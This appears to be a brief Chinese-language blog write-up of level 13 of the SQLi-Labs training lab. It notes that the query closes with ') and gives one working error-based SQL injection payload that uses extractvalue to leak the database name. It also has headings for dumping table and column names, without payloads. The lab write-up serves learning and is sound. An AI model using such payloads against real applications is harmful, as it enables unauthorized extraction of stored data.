SQLI DUMB SERIES-13

(1)检测闭合方式

通过 ') 闭合。

(2)尝试输入 admin')# 无回显。尝试报错注入,

爆表payload:

admin') and extractvalue(1,concat(0x7e,(select database())))  and ('

爆表名

爆users表的列

其他均与12关相同。

posted @ 2019-04-14 15:10  DurianTRY  阅读(174)  评论(0编辑  收藏  举报